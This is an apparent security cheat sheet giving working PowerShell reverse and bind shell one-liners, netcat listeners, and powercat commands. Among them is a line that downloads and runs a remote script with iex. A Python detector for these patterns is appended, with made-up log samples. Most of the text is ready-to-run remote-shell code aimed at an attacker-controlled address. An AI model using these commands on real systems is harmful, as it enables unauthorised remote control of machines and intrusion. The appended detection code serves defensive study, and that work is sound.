[Information Security] Reverse shells

1. Windows PowerShell reverse shell

Kali acts as the server; Windows uses PowerShell to connect to Kali and hands its shell over to Kali.

  • Windows side
$client = New-Object System.Net.Sockets.TCPClient('192.168.57.200',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
  • Kali side
nc -lvnp 4444

2. Windows PowerShell bind shell

Windows acts as the server and binds the shell to a listening port; Kali connects to it as the client.

  • Windows side
$listener = New-Object System.Net.Sockets.TcpListener('192.168.57.1',4444);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();
  • Kali side
nc -nv 192.168.57.1 4444

3. Reverse shell with powercat

powercat is not built into Windows and must be downloaded separately; on Kali it can be installed directly with sudo apt install powercat.

  • Installing powercat on Windows
# This method only applies to the current terminal session and requires the host to reach the public internet
iex (New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1")

# Reverse shell to Kali; Kali must be listening as the server at this point
powercat -c 192.168.57.200 -p 4444 -e cmd.exe
# Windows acts as the server and binds the shell to the listening port
powercat -l 192.168.57.1 -p 4444 -e cmd.exe
  • Kali side
# Kali starts listening; the Windows side connects out to it
nc -lnvp 4444
# Kali connects as a client to the Windows server
nc -nv 192.168.57.1 4444
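As an added defensive example (not part of the original post), a small Python scorer that flags PowerShell script block log records showing the socket-plus-execution shape shared by the commands in sections 1 to 3. The Event ID 4104 records, host names and indicator patterns are constructed assumptions for this example, not output from any real system.

```python
import re

# The one-liners on this page pair a raw TCP socket (TcpClient/TcpListener or
# powercat -c/-l) with execution of what arrives on it (iex, Invoke-Expression,
# powercat -e). Flag only when both families match, so a bare port check or a
# lone Invoke-Expression does not fire.
SOCKET_PATTERNS = [r"System\.Net\.Sockets\.TcpClient",
                   r"System\.Net\.Sockets\.TcpListener",
                   r"\bpowercat\b.*\s-[cl]\b"]
EXEC_PATTERNS = [r"\biex\b", r"Invoke-Expression",
                 r"\s-e\s+\S*(cmd|powershell)(\.exe)?\b"]
SUPPORT_PATTERNS = [r"\.GetStream\(\)", r"\.AcceptTcpClient\(\)",   # raise confidence,
                    r"\[text\.encoding\]::ASCII", r"DownloadString\("]  # never flag alone

def score_script_block(script: str) -> dict:
    """Return the indicator families that matched and whether the block is flagged."""
    hits = {}
    for family, patterns in (("socket", SOCKET_PATTERNS), ("exec", EXEC_PATTERNS),
                             ("support", SUPPORT_PATTERNS)):
        hits[family] = [p for p in patterns if re.search(p, script, re.IGNORECASE)]
    return {"flagged": bool(hits["socket"]) and bool(hits["exec"]), "hits": hits}

# Constructed Event ID 4104 (script block) records; host names are made up and
# the script text reuses only fragments of the commands shown above.
SAMPLE_EVENTS = [
    {"host": "WS01", "script": "$client = New-Object System.Net.Sockets.TCPClient('192.168.57.200',4444);"
                               "$stream = $client.GetStream();$sendback = (iex $data 2>&1 | Out-String)"},
    {"host": "WS02", "script": "powercat -c 192.168.57.200 -p 4444 -e cmd.exe"},
    {"host": "WS03", "script": "$t = New-Object System.Net.Sockets.TcpClient;$t.Connect('10.0.0.5',443);"
                               "$t.Connected;$t.Close()"},
    {"host": "WS04", "script": "Invoke-Expression 'Get-ChildItem C:\\Temp'"},
]

def triage(events: list) -> list:
    """Score each record; returns (host, flagged, families that matched)."""
    results = []
    for ev in events:
        r = score_script_block(ev["script"])
        results.append((ev["host"], r["flagged"], [f for f, h in r["hits"].items() if h]))
    return results

if __name__ == "__main__":
    for host, flagged, families in triage(SAMPLE_EVENTS):
        print(host, "FLAG" if flagged else "ok", families)
```

WS03 (a plain connectivity check) and WS04 (a lone Invoke-Expression) stay unflagged, which is the point of requiring both families before raising an alert.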